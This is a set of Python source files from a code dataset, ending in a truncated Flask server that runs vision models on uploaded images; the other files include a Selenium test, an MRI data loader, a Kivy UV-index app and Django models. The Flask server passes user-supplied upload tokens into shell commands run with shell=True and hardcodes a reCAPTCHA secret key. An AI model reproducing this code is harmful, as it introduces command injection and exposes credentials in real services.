make sure that no information\r\n\t\t## of Edith's is comin through from cookies etc\r\n\t\t\r\n\t\tnew_browser = browser()\r\n\r\n\t\t# Francis visits the home page. There is no sign of Edith's list\r\n\t\tnew_browser.get(live_server.url)\r\n\t\tpage_text = new_browser.find_elements_by_tag_name('body').text\r\n\t\tassert 'Buy peacock feathers' not in page_text\r\n\t\tassert 'make a fly' not in page_text\r\n\r\n\t\t# Francis starts a new list by entering a new item. He is less \r\n\t\t# interesting than Edith ...\r\n\t\tinputbox = new_browser.find_element_by_id('id_new_item')\r\n\t\tinputbox.send_keys('Buy milk')\r\n\t\tinputbox.send_keys(Keys.ENTER)\r\n\r\n\t\t# Francis gets his own unique URL\r\n\t\tfrancis_list_url = new_browser.current_url\r\n\t\tassert re.compile('/lists/.+').match(francis_list_url) is not None\r\n\r\n\t\t# Again there is no trace of Edith's list\r\n\t\tpage_text = new_browser.find_element_by_tag_name('body').text\r\n\t\tassert 'Buy peacock feathers' not in page_text\r\n\t\tassert 'Buy milk' in page_text\r\n\r\n\t\t# Satisfied they both go to sleep\r\n\r\nif __name__ == '__main__':\r\n\tpytest.main()","sub_path":"tests/functional_tests/test_functional.py","file_name":"test_functional.py","file_ext":"py","file_size_in_byte":3305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"335370604","text":"import os\nimport glob\nimport numpy as np\nimport SimpleITK as sitk\nimport torch.utils.data as Data\nimport scipy.ndimage\nimport itertools\nimport re\n\n'''\n通过继承Data.Dataset,实现将一组Tensor数据对封装成Tensor数据集\n至少要重载__init__,__len__和__getitem__方法\n'''\n\ndef resize(img, shape):\n factors = (\n shape[0] / img.shape[0],\n shape[1] / img.shape[1],\n shape[2] / img.shape[2],\n )\n return scipy.ndimage.zoom(img, factors, mode = \"constant\")\n\ndef crop(img):\n\tx, y, _ = img.shape\n\timg = img[48:x-16,8:y-8, :]\n\treturn img\n\ndef read_img(img):\n img = sitk.GetArrayFromImage(sitk.ReadImage(img))\n img = crop(img)\n return resize(img, (160, 192,160))[np.newaxis, ...]\n\nclass Dataset(Data.Dataset):\n def __init__(self, pathnames, name_regrex = \"(?PCase[0-9]+)-(?P[A-Z1-2_+]+).nii.gz\"):\n ## 读入数据\n # pathnames:[\"...*t1_flair\", \"...*t2_flair\"]\n if not isinstance(pathnames, list):\n pathnames = [pathnames]\n\n filelists = [glob.glob(path) for path in pathnames] # filelists:[[...t1.nii, ...t1.nii, ...], [...t2.nii, ...t2.nii, ...]]\n self.filelists = filelists\n self.filenames = list(itertools.chain(*self.filelists))\n self.file_id = []\n self.file_type = []\n\n dataset = {}\n\n for path in self.filenames:\n # Read img & Resize\n img = read_img(path)\n\n # Record sub_id\n # file_id = os.path.split(os.path.split(os.path.split(path)[0])[0])[1]\n # self.file_id.append(file_id)\n\n # Record type\n filename = os.path.basename(path)\n # print(filename)\n m = re.search(name_regrex, filename, flags = re.IGNORECASE)\n file_type = m.group(\"type\")\n file_id = m.group(\"name\")\n self.file_type.append(file_type)\n\n ## Combine data\n if file_id not in dataset.keys():\n dataset[file_id] = {} # dataset:{'sub1':{} }\n dataset[file_id][file_type] = img # dataset:{'sub1':{\"t1flair\": np.array(...), \"t1flair\" }\n\n ## Conbine 2 Modals\n self.images = []\n for imageset in dataset:\n self.images.append(\n np.block([\n dataset[imageset][\"T1\"],\n dataset[imageset][\"FLAIR\"]\n ])\n )\n self.file_id.append(imageset)\n\n def __len__(self):\n # 返回数据集的大小\n return len(self.images)\n\n def __getitem__(self, index):\n # 索引数据集中的某个数据,还可以对数据进行预处理\n # 下标index参数是必须有的,名字任意\n # 返回值自动转换为torch的tensor类型\n return self.images[index]","sub_path":"Model/datagenerators.py","file_name":"datagenerators.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"368314395","text":"#!/usr/bin/env python\n\nclass Atom:\n def __init__(self,name,x,y,z):\n self.name = name;\n self.x = x;\n self.y = y;\n self.z = z;\n\ndef parse_a_segment(f,atom_list):\n try:\n count = int( f.readline().split()[0])\n except:\n return False\n else:\n f.readline() # the comment line\n for i in range(count):\n try:\n segs = f.readline().split()\n xyzs = (float(segs[i]) for i in range(1,4))\n atom = Atom(segs[0],*xyzs)\n atom_list.append(atom)\n except:\n return False\n return True\n\n\ndef parse_file(file_name,atom_list):\n try:\n f = open(file_name,'r')\n except:\n print(\"Can't open file \"+str(file_name))\n else:\n while(parse_a_segment(f,atom_list)):\n pass\n\nimport sys\natoms = []\nfor i in range(1,len(sys.argv)):\n parse_file(sys.argv[i],atoms)\n\nprint(\" %d\" % len(atoms))\nprint(\"Generated by xyzcat.py\")\nfor i in atoms:\n print(\"%s %.8f %.8f %.8f\" % (i.name, i.x, i.y, i.z) )\n\n \n","sub_path":"xyzcat.py","file_name":"xyzcat.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"125963725","text":"#Imports the required modules.\r\n# kivy used to build the UI.\r\n# requests to download the xml content and make a new file.\r\n# ElementTree to parse the xml file.\r\n# os to delete the file once finished with it.\r\nimport kivy\r\nimport requests as rq\r\nimport xml.etree.ElementTree as et\r\nimport os\r\nfrom kivy.app import App\r\nfrom kivy.uix.button import Button\r\nfrom kivy.uix.label import Label\r\nfrom kivy.uix.boxlayout import BoxLayout\r\n\r\n#Sets a minimum version of kivy required to run the app.\r\nkivy.require('1.0.7')\r\n\r\n#Creates a new xml file in the location of this script.\r\n#Propagates content based on downloaded xml data.\r\ndef ARPANSARetrieval(self):\r\n url = ('https://uvdata.arpansa.gov.au/xml/uvvalues.xml')\r\n r = rq.get (url)\r\n with open ('UVDATA.xml', 'wb') as self.UVDATA:\r\n self.UVDATA.write(r.content)\r\n self.UVDATA = ('UVDATA.xml')\r\n \r\n #Uses ElementTree to parse xml iteratively.\r\n #Looks for 'time' and 'index' values assigned to 'Melbourne'.\r\n tree = et.parse(self.UVDATA)\r\n root = tree.getroot()\r\n for child in root.iter():\r\n locationofinterest = str(child.attrib)\r\n lc = locationofinterest\r\n if 'Melbourne' in lc:\r\n for y in child.iter('time'):\r\n time = y.text\r\n for x in child.iter('index'):\r\n #Needs to select part of the lc string because it contains characters\r\n #prior to 'Melbourne'.\r\n UVINDEX.L1.font_size ='60'\r\n UVINDEX.L1.bold =True\r\n UVINDEX.L1.text = (lc[8:17] + '''\\n'''+ x.text +' at ' + time)\r\n \r\n #Deletes the xml file that was created.\r\n os.remove(self.UVDATA)\r\n\r\n \r\n#Closes the app. \r\ndef Close(self):\r\n App.get_running_app().stop()\r\n \r\n#Provides the kivy code to build the UI.\r\nclass UVINDEX(App):\r\n def build(self):\r\n layout = BoxLayout(padding=2, spacing =10, orientation ='vertical')\r\n \r\n\r\n \r\n B1 = Button(text='GET UV', font_size ='40', bold =True, background_normal = '', background_color =(0.3,0.3,0.3,0.5), color =(1,1,1,1))\r\n B1.bind(on_release =ARPANSARetrieval)\r\n \r\n B2 =Button(text ='EXIT', font_size ='40', background_normal = '', background_color =(0.3,0.3,0.3,0.5))\r\n B2.bind(on_release =Close)\r\n UVINDEX.L1 =Label(text ='', color =(1,0.3,0.1,1))\r\n layout.add_widget(self.L1)\r\n layout.add_widget(B1)\r\n layout.add_widget(B2)\r\n \r\n return layout\r\n\r\n\r\n\r\n#Calls the app and keeps it active.\r\nif __name__ == '__main__':\r\n UVINDEX().run()\r\n\r\n","sub_path":"UV Index KIVY.py","file_name":"UV Index KIVY.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"92983575","text":"#!/usr/bin/python\n\nimport argparse\n\n# find_max_profit([1050, 270, 1540, 3800, 2])\n\n# To achieve O(N), I need to be able to do all calculations by traversing the list\n# once. Anything faster than O(N) is unlikely as to find maximum we need to have\n# inspected each element at least once\ndef find_max_profit(prices):\n\t\n\tlast_index = len(prices) - 1\n\t\n\tlargest = (prices[last_index], last_index)\n\tsmallest = (prices[last_index - 1], last_index - 1)\n\tsecond_largest = (prices[last_index], last_index)\n\t\n\tnon_increasing = False\n\n\tfor index in reversed(range(0, len(prices))):\n\t\tif largest[0] <= prices[index]:\n\t\t\tlargest = (prices[index], index)\n\t\t\tif index > 0:\n\t\t\t\t# Set's smallest number to number to th\n\t\t\t\tsmallest = (prices[index - 1], index - 1)\n\t\t\t\tprint(smallest)\n\t\t# set's second largest in case of non increasing list\n\t\tif index < last_index and second_largest[0] < prices[index + 1] and prices[index + 1] < largest[0]:\n\t\t\t\tsecond_largest = (prices[index + 1], index + 1)\n\n# Set's the smallest number if there is a smaller number at index\n\t\tif index > 1 and smallest[0] > prices[index - 1]:\n\t\t\tsmallest = (prices[index - 1], index-1)\n\t\t\tprint(smallest)\n\n\tif largest[1] == 0:\n\t\treturn second_largest[0] - largest[0]\n\telse:\n\t\treturn largest[0] - smallest[0]\n\nif __name__ == '__main__':\n # This is just some code to accept inputs from the command line\n parser = argparse.ArgumentParser(description='Find max profit from prices.')\n parser.add_argument('integers', metavar='N', type=int, nargs='+', help='an integer price')\n args = parser.parse_args()\n\n print(\"A profit of ${profit} can be made from the stock prices {prices}.\".format(profit=find_max_profit(args.integers), prices=args.integers))\n\n\n\nprices = [100, 100, 90, 80, 50, 20, 10]\nprices2 = [1050, 270, 1540, 3800, 2]\nprices3 = [10, 7, 5, 8, 11, 9]\n\nprint(find_max_profit(prices))\nprint(find_max_profit(prices2))\nprint(find_max_profit(prices3))\n","sub_path":"stock_prices/stock_prices.py","file_name":"stock_prices.py","file_ext":"py","file_size_in_byte":1910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"287952610","text":"from django.db import models\nfrom django.core.urlresolvers import reverse\nfrom django.contrib.auth.models import User\nfrom django.db.models import Avg\nfrom geoposition.fields import GeopositionField\n\nimport os\nimport uuid\n\nRATING_CHOICES = (\n (0, 'None'),\n (1, '*'),\n (2, '**'),\n (3, '***'),\n (4, '****'),\n (5, '*****'),\n )\n\nYESNO_CHOICES = (\n (0, 'No'),\n (1, 'Yes')\n )\n\nPLURAL_CHOICES = (\n (0, 'None'),\n (1, 'Minimal'),\n (2, 'Some'),\n (3, 'Ample')\n )\n\nWIFI_CHOICES = (\n (0, 'None'),\n (1, 'Spotty'),\n (2, 'Strong')\n )\n\nGYM_CHOICES = (\n (0, 'None'),\n (1, 'At least you can run outside'),\n (2, 'Basic Equipment'),\n (3, 'Specialized Equipment'),\n (4, 'As good as it can get'),\n )\n\nKITCHEN_CHOICES = (\n (0, 'You can always do take-out'),\n (1, 'Microwave and Mini-Fridge'),\n (2, 'Stove and basic cooking utensils'),\n (3, 'Stove, Oven and standard cooking utensils'),\n (4, 'Professional Kitchen with Oven, Stove and anything you might need to cook the perfect meal'),\n )\n\nPROPERTY_TYPE = (\n (0, 'Terreno'),\n (1, 'Apartamento'),\n (2, 'Townhouse'),\n (3, 'Casa'),\n (4, 'Casa en Condominio o Comunidad Privada'),\n)\n\nLISTING_TYPE = (\n (0, 'Rent'),\n (1, 'Rent / Buy'),\n (2, 'Buy'),\n)\n\nCARDINAL_DIRECTIONS = (\n(0, 'North'),\n(1, 'West'),\n(2, 'South'),\n(3, 'East'),\n )\n\n\n\ndef upload_to_location(instance, filename):\n blocks = filename.split('.')\n ext = blocks[-1]\n filename = \"%s.%s\" % (uuid.uuid4(), ext)\n instance.title = blocks[0]\n return os.path.join('uploads/', filename)\n\n# Create your models here.\n\nclass Location(models.Model):\n # General Information about the Location\n listing_type = models.IntegerField(choices=LISTING_TYPE, null= True, blank = True)\n property_type = models.IntegerField(choices=PROPERTY_TYPE, null= True, blank = True)\n\n # Relevant Display Information\n title = models.CharField(max_length=300)\n description = models.TextField(null=True, blank=True)\n address = models.TextField(null=True, blank=True)\n position = GeopositionField(null=True, blank=True)\n image_file = models.ImageField(upload_to=upload_to_location, null=True, blank=True)\n\n # Pricing core data\n sale_price = models.FloatField(blank = True,null = True)\n rent_price = models.FloatField(blank = True,null = True)\n property_tax = models.FloatField(blank=True, null=True)\n\n bedrooms = models.PositiveIntegerField(blank=True, null = True)\n bathrooms = models.PositiveIntegerField(blank=True, null = True)\n parking_spaces = models.PositiveIntegerField(blank = True, null = True)\n maintenance_fee = models.PositiveIntegerField(blank=True, null=True)\n\n\n # Property Specific Descriptors\n year_built = models.PositiveIntegerField(null=True, blank = True)\n new_construction = models.IntegerField(choices = YESNO_CHOICES, null = True, blank = True)\n building_story = models.PositiveIntegerField(null = True, blank = True)\n unit_story = models.PositiveIntegerField(null = True, blank = True)\n builder_name = models.TextField(null = True, blank = True)\n front_door_faces = models.IntegerField(choices= CARDINAL_DIRECTIONS,blank=True, null = True)\n alarm_system_installed = models.IntegerField(choices=YESNO_CHOICES, blank=True, null=True)\n\n\n # Original Descriptors\n furnished = models.IntegerField(choices=YESNO_CHOICES, null = True, blank = True)\n hours = models.TextField(null=True, blank=True)\n wifi = models.IntegerField(choices=WIFI_CHOICES, null=True, blank=True)\n furniture = models.IntegerField(choices=PLURAL_CHOICES, null=True, blank=True)\n outlets = models.IntegerField(choices=PLURAL_CHOICES, null=True, blank=True)\n bathrooms_available = models.IntegerField(choices=YESNO_CHOICES, null=True, blank=True)\n gym = models.IntegerField(choices=GYM_CHOICES, null=True, blank=True)\n kitchen = models.IntegerField(choices=KITCHEN_CHOICES, null=True, blank=True)\n outdoor = models.IntegerField(choices=YESNO_CHOICES, null=True, blank=True)\n pets = models.IntegerField(choices=YESNO_CHOICES, null=True, blank=True)\n \n created_at = models.DateTimeField(auto_now_add=True)\n\n \n def __unicode__(self):\n return self.title\n\n def get_absolute_url(self):\n \treturn reverse(viewname=\"location_list\", args=[self.id])\n\n def get_average_rating(self):\n average = self.review_set.all().aggregate(Avg('rating'))['rating__avg']\n if average == None:\n return average\n else:\n return int(average)\n\n def get_reviews(self):\n return self.review_set.all()\n\nclass Review(models.Model):\n location = models.ForeignKey(Location)\n user = models.ForeignKey(User)\n description = models.TextField(null=True, blank=True)\n rating = models.IntegerField(choices=RATING_CHOICES, null=True, blank=True)\n created_at = models.DateTimeField(auto_now_add=True)\n","sub_path":"core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"413970576","text":"from ..util.http_status_code import OK, CREATED, BAD_REQUEST, NOT_FOUND_REQUEST\n\n\nclass BaseController:\n \n @classmethod\n def get(cls, id, Model):\n \n if not id:\n return {\"message\":\"id não pode ser nulo.\"}, BAD_REQUEST\n\n model = Model.find_by_id(id)\n if not model:\n return {\"message\":\"Recurso não encontrado.\"}, NOT_FOUND_REQUEST\n \n return model.serialize(), OK\n \n @classmethod\n def post(cls, body, Model):\n\n if not body:\n return {\"message\":\"Não encontrado dados no corpo da requisição.\"}, BAD_REQUEST\n \n print(body)\n new_model = Model(**body)\n new_model.save_to_db()\n\n return new_model.serialize(), CREATED\n\n @classmethod\n def put(cls, body, Model):\n\n if not body:\n return {\"message\":\"Dados não encontrado no corpo da requisição.\"}, BAD_REQUEST\n \n try:\n id_key = list(filter(lambda k: k.startswith(\"id_\"), body.keys()))[0]\n except IndexError:\n return {\"message\":\"id não encontrado. O id do recurso deve ser enviado na requisição para realizar a atualização.\"}, BAD_REQUEST\n \n id = body.get(id_key)\n\n model = Model.find_by_id(id)\n if not model:\n return {\n \"message\":\"dados não encontrado para esse recurso.\"\\\n \"Para realizar a atualização o recurso deve está registrado no banco de dados.\"\n }, BAD_REQUEST\n\n Model.update_by_id(id, body)\n \n return {\"message\":\"Atualizado com sucesso.\"}, OK\n\n @classmethod\n def delete(cls, id, Model):\n \n model = Model.find_by_id(id)\n \n if not model:\n return {\"message\":\"Can't delete, not found this discente.\"}, BAD_REQUEST\n \n model.delete_from_db()\n\n return {\"message\":\" Deleted\"}, OK\n\n @classmethod\n def get_list(cls, Model):\n models = Model.query_all()\n serialized = [model.serialize() for model in models]\n return serialized\n \nclass BaseHasNameController(BaseController):\n \n @classmethod\n def get_all_names(cls, Model):\n \n # models_names receve a tuple of (nome , id)\n model_names = Model.query_all_names()\n\n #create a dict with nome as key and id as a value\n names_dict = [{\"nome\":row.nome, \"id\":row.id} for row in model_names]\n \n return names_dict\n\n# class to show up recurso_campus\nclass BaseHasHorarioController(BaseHasNameController):\n\n @classmethod\n def get_all_names(cls, Model):\n # models_names receve a tuple of (nome , id)\n model_names = Model.query_all_names()\n\n #create a dict with nome as key and id as a value\n names_dict = [\n {\n \"nome\":row.nome, \n \"id\":row.id, \n \"inicio_horario\":str(row.inicio_horario),\n \"fim_hoario\":str(row.inicio_horario)\n } for row in model_names\n ]\n \n return names_dict\n\n#Class to handle users\nclass BaseHasUsuarioController(BaseHasNameController):\n\n @classmethod\n def post(cls, body, Model, usuario):\n\n if not body:\n return {\"message\":\"não há dados no body da requsição.\"}, BAD_REQUEST\n \n print(body)\n new_model = Model(**body, usuario=usuario)\n new_model.save_to_db()\n\n return new_model.serialize(), CREATED\n\n @classmethod\n def get_by_usuario(cls, usuario_id_usuario, Model):\n\n model_queried = Model.find_by_id_usuario(usuario_id_usuario)\n if model_queried:\n return model_queried.serialize(), OK\n \n return {\"message\":\"usuario not found\"}, NOT_FOUND_REQUEST\n\n#class to randle user that has matricula or siape\nclass BaseHasOtherIdController(BaseHasNameController):\n\n @classmethod\n def get_all_names(cls, Model):\n \n # models_names receve a tuple of (nome , id)\n model_names = Model.query_all_names()\n\n #create a dict with nome as key and id as a value\n names_dict = [{\"nome\":row.nome, \"id\":row.id, \"matricula\":row.other_id} for row in model_names]\n \n return names_dict\n\nclass BaseHasCPFController(BaseController):\n \n @classmethod\n def get_all_names(cls, Model):\n \n # models_names receve a tuple of (nome , id)\n model_names = Model.query_all_names()\n\n #create a dict with nome as key and id as a value\n names_dict = [{\"nome\":row.nome, \"id\":row.id, \"cpf\":row.cpf} for row in model_names]\n \n return names_dict","sub_path":"app/controller/base_controller.py","file_name":"base_controller.py","file_ext":"py","file_size_in_byte":4667,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"504222965","text":"from flask import Flask, request, current_app, send_from_directory\nfrom flask_cors import CORS, cross_origin\nfrom flask_hashing import Hashing # pip install Flask-Hashing\n\nfrom flask import Flask, render_template, request\nfrom flask_uploads import UploadSet, configure_uploads, IMAGES # pip install Flask-Uploads\n\n# from flask.ext.API import status\nimport json\nimport os\nfrom PIL import Image\nfrom shutil import copyfile\nimport time\nimport traceback\nfrom subprocess import call\nimport traceback as tb\n\nimport requests\n#import boto3\n#import botocore\nimport pdb\n#pdb.set_trace()\n#s3 = boto3.resource('s3')\n\napp = Flask(__name__)\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n#app = Flask(__name__, static_url_path='', static_folder=\"/\")\napp.config['CORS_HEADERS'] = 'Content-Type'\napp.config['UPLOADED_PHOTOS_DEST'] = '/demo-code/uploaded_photos/'\napp.config['INPUT_PHOTOS_DEST'] = '/demo-code/other/demo_images'\napp.config['PROCESSED_PHOTOS_DEST'] = '/demo-code/other/task-demo-results'\napp.config['PROCESSING_SCRIPT_LOCATION'] = '/demo-code/scaling/demo.py'\nPROCESSOR_SERVER = 'localhost' #'taskonomy-task-demo-797030650.us-west-2.elb.amazonaws.com'\n#PROCESSOR_SERVER = 'taskonomy-task-demo-797030650.us-west-2.elb.amazonaws.com'\nVALID_UPLOADTOKEN_PREFIX = \"aa\"\n\nUPLOAD_TOKENS_FOR_SAMPLES = ['sample1', 'sample2', 'sample3']\n\ncors = CORS(app, resources={\n r\"/\": {\"origins\": \"*\"},\n r\"/getresults\": {\"origins\": \"*\"},\n})\nhashing = Hashing(app)\nphotos = UploadSet('photos', IMAGES)\nconfigure_uploads(app, photos)\n\nsalt = \"jitendra\"\n\nmap_to_display_names = {\n 'rgb2sfnorm': 'Normals',\n 'reshade': 'Reshading',\n 'rgb2depth': 'Z-Depth',\n 'rgb2sfnormb': 'Normals_Baseline',\n 'reshadeb': 'Reshading_Baseline',\n 'rgb2depthb': 'Z-Depth_Baseline',\n 'curvature_consistency' : 'Curvature_Consistency',\n 'edge2d_consistency' : 'Edge2D_Consistency',\n 'edge3d_consistency' : 'Edge3D_Consistency',\n 'keypoint2d_consistency': 'Keypoint2D_Consistency',\n 'keypoint3d_consistency' : 'Keypoint3D_Consistency',\n 'curvature_baseline' : 'Curvature_Baseline',\n 'edge2d_baseline' : 'Edge2D_Baseline',\n 'edge3d_baseline' : 'Edge3D_Baseline',\n 'keypoint2d_baseline': 'Keypoint2D_Baseline',\n 'keypoint3d_baseline' : 'Keypoint3D_Baseline',\n}\n\npercep_tasks = ['curvature', 'edge2d', 'edge3d', 'keypoint2d', 'keypoint3d']\n\ndisplay_name_to_task = {v: k for k, v in map_to_display_names.items()}\nlist_of_tasks = 'rgb2sfnorm reshade rgb2depth rgb2sfnormb reshadeb rgb2depthb'\nlist_of_tasks = list_of_tasks.split()\n\nports = [ 8080 + i for i in range(len(list_of_tasks))]\n\ndef touch(fname, times=None):\n with open(fname, 'a'):\n os.utime(fname, times)\n\ndef clean_task_name(task):\n task = task.replace(\"(\",\"\")\n task = task.replace(\")\",\"\")\n task = task.replace(\".\",\"\")\n task = task.replace(\" \",\"_\")\n return task\n\n\ndef convert_to_png(src):\n ''' Convert all images to PNG to save us a headache '''\n _, ext = os.path.splitext(src)\n dst = src.replace(ext, \".png\")\n if src == dst:\n return src\n call(\"convert {} {} && rm {}\".format(src, dst, src), shell=True)\n return dst\n\ndef fix_orientation(filename):\n ''' iOS devices might save images as portraits. This is handled\n by parsing EXIF data. However, python libraries often do not\n implement EXIF handling. Therefore, we may rotate/flip the image\n as appropriate here, before saving, to spare us from the headache.\n\n Warnings: Mutates saved image on disk\n\n Inputs:\n filename: path to the saved image\n '''\n img = Image.open(filename)\n if hasattr(img, '_getexif'):\n exifdata = img._getexif()\n try:\n orientation = exifdata.get(274)\n print(\"ORIENTATION\", orientation)\n except:\n # There was no EXIF Orientation Data\n orientation = 1\n else:\n orientation = 1\n\n if orientation is 1: # Horizontal (normal)\n pass\n elif orientation is 2: # Mirrored horizontal\n img = img.transpose(Image.FLIP_LEFT_RIGHT)\n elif orientation is 3: # Rotated 180\n img = img.rotate(180)\n elif orientation is 4: # Mirrored vertical\n img = img.rotate(180).transpose(Image.FLIP_LEFT_RIGHT)\n elif orientation is 5: # Mirrored horizontal then rotated 90 CCW\n img = img.rotate(-90).transpose(Image.FLIP_LEFT_RIGHT)\n elif orientation is 6: # Rotated 90 CCW\n img = img.rotate(-90)\n elif orientation is 7: # Mirrored horizontal then rotated 90 CW\n img = img.rotate(90).transpose(Image.FLIP_LEFT_RIGHT)\n elif orientation is 8: # Rotated 90 CW\n img = img.rotate(90)\n\n img.save(filename)\n\ndef process_input_file(src, unique_dir, fpath, filename, task, uploadToken):\n#def process_input_file(raw_file_name, task):\n #print(\"Requesting:\", raw_file_name, task)\n ## dir_for_token = uploadDirForToken(request.args['uploadtoken'])\n ## fname = secureFileName(request.args['uploadtoken'], \"__\") + display_name_to_task[request.args['task']] + \".png\"\n #pdb.set_trace()\n #try:\n # print(task, task_to_port[display_name_to_task[task]])\n # s3.Object(app.config['PROCESSED_PHOTOS_DEST'], raw_file_name.replace(\".png\", \"__\" + display_name_to_task[task] + \".png\")).delete()\n # r = requests.get(\n # 'http://{}:{}/process?key={}'.format(\n # PROCESSOR_SERVER,\n # task_to_port[display_name_to_task[task]],\n # raw_file_name),\n # timeout=0.000001\n # )\n #except:\n # # tb.print_exc()\n # pass\n\n head, ext = os.path.splitext(filename)\n ext = \".png\"\n # # task = task.replace(\" \", \"_\")\n cleaned_task = clean_task_name(task)\n # # cmd = \"sudo cp \" + os.path.join(fpath, filename) + \" \" + os.path.join(fpath, task + ext)\n\n tmpdir = '/demo-code/uploaded_photos/' + unique_dir\n call(\"mkdir \" + tmpdir, shell=True)\n call(\"mkdir \" + fpath, shell=True)\n\n src = convert_to_png(src)\n #pdb.set_trace()\n\n call(\"cp {} {}\".format(\n src, tmpdir\n ), shell=True)\n #pdb.set_trace()\n cmd = \"python {} --task {} --img_path {} --output_path {}\".format(\n app.config['PROCESSING_SCRIPT_LOCATION'],\n display_name_to_task[task],\n tmpdir,\n tmpdir\n )\n call(cmd, shell=True)\n\n call(\"cp {} {} && rm {}\".format(\n os.path.join(tmpdir, display_name_to_task[task] + ext),\n os.path.join(fpath, cleaned_task + ext),\n os.path.join(tmpdir, display_name_to_task[task] + ext)\n ), shell=True)\n\n\n cmd_gsutil = \"gsutil cp {} {}\".format(\n os.path.join(fpath, cleaned_task + ext),\n \"gs://taskonomy-shared/assets/task-demo-results/\" + uploadToken\n + \"__\" + display_name_to_task[task] + \".png\")\n\n\n #call(cmd_gsutil, shell=True)\n\n cmd_cplocal = \"cp {} {}\".format(\n os.path.join(fpath, cleaned_task + ext),\n \"/demo-page/static/task-demo-results/\" + uploadToken\n + \"__\" + display_name_to_task[task] + \".png\")\n\n call(cmd_cplocal, shell=True)\n\n cmd_cplocal2 = \"cp {} {}\".format(\n os.path.join(fpath, cleaned_task + ext),\n \"/website/static/task-demo-results/\" + uploadToken\n + \"__\" + display_name_to_task[task] + \".png\")\n\n call(cmd_cplocal2, shell=True)\n\n print(\"Current task is\", task)\n if task is 'Normals': #save perceps\n for i in range(len(percep_tasks)):\n call(\"cp -r {} {} && cp -r {} {}\".format(\n os.path.join(tmpdir, percep_tasks[i] + '_consistency' + ext),\n \"/demo-page/static/task-demo-results/\" + uploadToken + '__' + percep_tasks[i] + '_consistency' + ext,\n os.path.join(tmpdir, percep_tasks[i] + '_consistency' + ext),\n \"/website/static/task-demo-results/\" + uploadToken + '__' + percep_tasks[i] + '_consistency' + ext,\n\n ), shell=True)\n\n call(\"rm {}\".format(\n os.path.join(tmpdir, percep_tasks[i] + '_consistency' + ext),\n ), shell=True)\n\n\n if task is 'Normals_Baseline': #save perceps\n for i in range(len(percep_tasks)):\n call(\"cp -r {} {} && cp -r {} {}\".format(\n os.path.join(tmpdir, percep_tasks[i] + '_baseline' + ext),\n \"/demo-page/static/task-demo-results/\" + uploadToken + '__' + percep_tasks[i] + '_baseline' + ext,\n os.path.join(tmpdir, percep_tasks[i] + '_baseline' + ext),\n \"/website/static/task-demo-results/\" + uploadToken + '__' + percep_tasks[i] + '_baseline' + ext,\n ), shell=True)\n\n call(\"rm {}\".format(\n os.path.join(tmpdir, percep_tasks[i] + '_baseline' + ext),\n ), shell=True)\n\n\n # # /home/ubuntu/anaconda3/bin/python /home/ubuntu/task-taxonomy-331b/tools/run_img_task.py --task reshade --img /home/ubuntu/s3/demo_images/92ba9602b8339d47df10be880c1d773a8e6b74465eb6a0bc5e7ec9391574aa64/download.png --store /home/ubuntu/s3/demo_images/92ba9602b8339d47df10be880c1d773a8e6b74465eb6a0bc5e7ec9391574aa64/2D_Edges.png\n\n # # call(cmd, shell=True)\n\ndef uploadDirForToken(uploadToken):\n return hashing.hash_value(uploadToken, salt=salt)\n\ndef secureFileName(uploadToken, ext):\n return uploadToken + ext\n # return hashing.hash_value(uploadToken, salt=salt)[:32] + ext\n\n\n# TARGET_TASKS = [\n# 'Autoencoding', 'Curvature', 'Scene Class.', 'Denoising', '2D Edges', 'Occlusion Edges',\n# '2D Keypoints', '3D Keypoints', 'Reshading', 'Z-Depth', 'Distance', 'Normals', 'Layout',\n# '2.5D Segm.', '2D Segm.', 'Vanishing Pts.', 'Semantic Segm.', 'Object Class. (1000)',\n# 'Colorization', 'Jigsaw', 'In-painting'\n# ]\n\nsortOrder = [\n 'rgb2sfnorm',\n 'reshade',\n 'rgb2depth',\n 'rgb2sfnormb',\n 'reshadeb',\n 'rgb2depthb'\n ];\n\nTARGET_TASKS = [map_to_display_names[t] for t in sortOrder]\n#CAPTCHA_SECRET = \"6Ler2EYUAAAAAI1hOvXBOpCUTwVZ6ZZ9y04P6YfY\"\n# CAPTCHA_SECRET = \"6LebLEoUAAAAAPf5vmOe-QjzVhAx8U-Q16Ut488i\"\nCAPTCHA_SECRET = \"6LcswN4UAAAAANsmSXmhqZzKtN039HjlR_QiAOBw\"\ndef validate_captcha(request):\n print({\n \"secret\": CAPTCHA_SECRET,\n \"response\": request.form['g-recaptcha-response'],\n \"remoteip\": request.remote_addr\n })\n r = requests.post(\n 'https://www.google.com/recaptcha/api/siteverify',\n data={\n \"secret\": CAPTCHA_SECRET,\n \"response\": request.form['g-recaptcha-response'],\n \"remoteip\": request.remote_addr\n })\n\n return r.json()['success']\n\n\n@app.route(\"/\")\ndef home():\n return render_template(\"index.html\")\n\n#@app.route('/runmodels', methods=['GET', 'POST'])\n@app.route('/demopage/runmodels', methods=['GET', 'POST'])\ndef upload():\n try:\n if request.method == 'POST' and 'photo' in request.files:\n if not validate_captcha(request):\n return \"Captcha failed\", 403\n uploadToken = request.form['uploadToken']\n\n if uploadToken in UPLOAD_TOKENS_FOR_SAMPLES:\n print(\"in Sample\")\n return 'sample', 200\n elif not uploadToken.startswith(VALID_UPLOADTOKEN_PREFIX):\n return 'Invalid upload token', 403\n\n rawFileName = secureFileName(uploadToken, '.png')\n filename = photos.save(request.files['photo'])\n\n dir_for_token = app.config['PROCESSED_PHOTOS_DEST'] + \"/\" + uploadDirForToken(uploadToken)\n call(\"sudo mkdir \" + dir_for_token, shell=True)\n\n src = app.config['UPLOADED_PHOTOS_DEST'] + filename\n\n\n #### HERE #####\n fix_orientation(os.path.join(app.config['UPLOADED_PHOTOS_DEST'], filename))\n\n #cmd 